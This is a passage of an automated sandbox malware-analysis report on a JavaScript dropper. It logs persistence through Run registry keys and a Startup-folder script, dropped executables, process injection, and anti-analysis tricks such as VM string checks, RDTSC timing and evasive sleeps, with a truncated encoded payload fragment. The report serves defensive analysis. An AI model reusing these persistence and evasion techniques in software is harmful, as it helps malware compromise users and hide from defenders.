Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FD625 push eax; ret 18_2_032FD678
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FD67B push eax; ret 18_2_032FD6E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FD672 push eax; ret 18_2_032FD678
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FD6DC push eax; ret 18_2_032FD6E2
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Source: CIQ-PO162667.js String : entropy: 5.56, length: 338084, content: 'dHJ5ewp2YXIgbG9uZ1RleHQxID0gImRIbHdaVzltSUNnaFFYSnlZWGt1Y0hKdmRHOTBlWEJsTG1admNrVmhZMmdnUHlCQmNuSmh Go to definition
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run T2KDJXN Jump to behavior
Drops script or batch files to the startup folder
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmtwmJXhXe.js Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmtwmJXhXe.js Jump to behavior
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmtwmJXhXe.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run T2KDJXN Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run T2KDJXN Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 00000000000B8C04 second address: 00000000000B8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 00000000000B8F9E second address: 00000000000B8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000032E8C04 second address: 00000000032E8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000032E8F9E second address: 00000000032E8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe RDTSC instruction interceptor: First address: 0000000000C58C04 second address: 0000000000C58C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe RDTSC instruction interceptor: First address: 0000000000C58F9E second address: 0000000000C58FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5872 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5612 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5612 Thread sleep time: -74000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B8ED0 rdtsc 2_2_000B8ED0
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032F1660 FindFirstFileW,FindNextFileW,FindClose, 18_2_032F1660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032F1659 FindFirstFileW,FindNextFileW,FindClose, 18_2_032F1659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: explorer.exe, 00000004.00000000.328024223.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.328633752.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
Source: explorer.exe, 00000004.00000000.376103293.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000004.00000000.418272158.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.328633752.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000004.00000000.390516660.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.328633752.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
Source: explorer.exe, 00000004.00000000.420582143.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: wscript.exe, 00000001.00000002.823061632.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714465991.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384876292.000001B7453F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.815158211.000001B7453E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384691056.000001B7453AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714217538.000001B7453C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384897364.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714035079.000001B7453AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.801731870.000001B7453A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574260264.000001A547F9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.573810530.000001A547FEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.316690565.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: <C:\Users\user\AppData\Roamingd_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.366337221.000000000820C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.328633752.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
Source: wscript.exe, 0000000F.00000003.615856775.0000023E30F26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.804286141.0000023E30F26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW)
Source: explorer.exe, 00000004.00000000.328024223.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000000.328633752.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B8ED0 rdtsc 2_2_000B8ED0
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0181C182 mov eax, dword ptr fs:[00000030h] 2_2_0181C182
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182A185 mov eax, dword ptr fs:[00000030h] 2_2_0182A185
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FB171 mov eax, dword ptr fs:[00000030h] 2_2_017FB171
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FB171 mov eax, dword ptr fs:[00000030h] 2_2_017FB171
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01822990 mov eax, dword ptr fs:[00000030h] 2_2_01822990
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FC962 mov eax, dword ptr fs:[00000030h] 2_2_017FC962
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018769A6 mov eax, dword ptr fs:[00000030h] 2_2_018769A6
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018261A0 mov eax, dword ptr fs:[00000030h] 2_2_018261A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018261A0 mov eax, dword ptr fs:[00000030h] 2_2_018261A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018751BE mov eax, dword ptr fs:[00000030h] 2_2_018751BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018751BE mov eax, dword ptr fs:[00000030h] 2_2_018751BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018751BE mov eax, dword ptr fs:[00000030h] 2_2_018751BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018751BE mov eax, dword ptr fs:[00000030h] 2_2_018751BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018841E8 mov eax, dword ptr fs:[00000030h] 2_2_018841E8
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9100 mov eax, dword ptr fs:[00000030h] 2_2_017F9100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9100 mov eax, dword ptr fs:[00000030h] 2_2_017F9100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9100 mov eax, dword ptr fs:[00000030h] 2_2_017F9100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FB1E1 mov eax, dword ptr fs:[00000030h] 2_2_017FB1E1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FB1E1 mov eax, dword ptr fs:[00000030h] 2_2_017FB1E1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FB1E1 mov eax, dword ptr fs:[00000030h] 2_2_017FB1E1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01814120 mov eax, dword ptr fs:[00000030h] 2_2_01814120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01814120 mov eax, dword ptr fs:[00000030h] 2_2_01814120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01814120 mov eax, dword ptr fs:[00000030h] 2_2_01814120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01814120 mov eax, dword ptr fs:[00000030h] 2_2_01814120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01814120 mov ecx, dword ptr fs:[00000030h] 2_2_01814120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182513A mov eax, dword ptr fs:[00000030h] 2_2_0182513A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182513A mov eax, dword ptr fs:[00000030h] 2_2_0182513A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0181B944 mov eax, dword ptr fs:[00000030h] 2_2_0181B944
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0181B944 mov eax, dword ptr fs:[00000030h] 2_2_0181B944
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01873884 mov eax, dword ptr fs:[00000030h] 2_2_01873884
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01873884 mov eax, dword ptr fs:[00000030h] 2_2_01873884
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 mov eax, dword ptr fs:[00000030h] 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 mov eax, dword ptr fs:[00000030h] 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 mov eax, dword ptr fs:[00000030h] 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 mov eax, dword ptr fs:[00000030h] 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 mov eax, dword ptr fs:[00000030h] 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 mov eax, dword ptr fs:[00000030h] 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018390AF mov eax, dword ptr fs:[00000030h] 2_2_018390AF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182F0BF mov ecx, dword ptr fs:[00000030h] 2_2_0182F0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182F0BF mov eax, dword ptr fs:[00000030h] 2_2_0182F0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182F0BF mov eax, dword ptr fs:[00000030h] 2_2_0182F0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0188B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0188B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_0188B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0188B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0188B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0188B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0188B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01877016 mov eax, dword ptr fs:[00000030h] 2_2_01877016
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01877016 mov eax, dword ptr fs:[00000030h] 2_2_01877016
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01877016 mov eax, dword ptr fs:[00000030h] 2_2_01877016
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F58EC mov eax, dword ptr fs:[00000030h] 2_2_017F58EC
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C4015 mov eax, dword ptr fs:[00000030h] 2_2_018C4015
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C4015 mov eax, dword ptr fs:[00000030h] 2_2_018C4015
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180B02A mov eax, dword ptr fs:[00000030h] 2_2_0180B02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180B02A mov eax, dword ptr fs:[00000030h] 2_2_0180B02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180B02A mov eax, dword ptr fs:[00000030h] 2_2_0180B02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180B02A mov eax, dword ptr fs:[00000030h] 2_2_0180B02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182002D mov eax, dword ptr fs:[00000030h] 2_2_0182002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182002D mov eax, dword ptr fs:[00000030h] 2_2_0182002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182002D mov eax, dword ptr fs:[00000030h] 2_2_0182002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182002D mov eax, dword ptr fs:[00000030h] 2_2_0182002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182002D mov eax, dword ptr fs:[00000030h] 2_2_0182002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01810050 mov eax, dword ptr fs:[00000030h] 2_2_01810050
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01810050 mov eax, dword ptr fs:[00000030h] 2_2_01810050
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018B2073 mov eax, dword ptr fs:[00000030h] 2_2_018B2073
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C1074 mov eax, dword ptr fs:[00000030h] 2_2_018C1074
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9080 mov eax, dword ptr fs:[00000030h] 2_2_017F9080
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018B138A mov eax, dword ptr fs:[00000030h] 2_2_018B138A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018AD380 mov ecx, dword ptr fs:[00000030h] 2_2_018AD380
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01801B8F mov eax, dword ptr fs:[00000030h] 2_2_01801B8F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01801B8F mov eax, dword ptr fs:[00000030h] 2_2_01801B8F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182B390 mov eax, dword ptr fs:[00000030h] 2_2_0182B390
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01822397 mov eax, dword ptr fs:[00000030h] 2_2_01822397
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FDB60 mov ecx, dword ptr fs:[00000030h] 2_2_017FDB60
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FF358 mov eax, dword ptr fs:[00000030h] 2_2_017FF358
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C5BA5 mov eax, dword ptr fs:[00000030h] 2_2_018C5BA5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01824BAD mov eax, dword ptr fs:[00000030h] 2_2_01824BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01824BAD mov eax, dword ptr fs:[00000030h] 2_2_01824BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01824BAD mov eax, dword ptr fs:[00000030h] 2_2_01824BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FDB40 mov eax, dword ptr fs:[00000030h] 2_2_017FDB40
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018753CA mov eax, dword ptr fs:[00000030h] 2_2_018753CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018753CA mov eax, dword ptr fs:[00000030h] 2_2_018753CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018203E2 mov eax, dword ptr fs:[00000030h] 2_2_018203E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018203E2 mov eax, dword ptr fs:[00000030h] 2_2_018203E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018203E2 mov eax, dword ptr fs:[00000030h] 2_2_018203E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018203E2 mov eax, dword ptr fs:[00000030h] 2_2_018203E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018203E2 mov eax, dword ptr fs:[00000030h] 2_2_018203E2
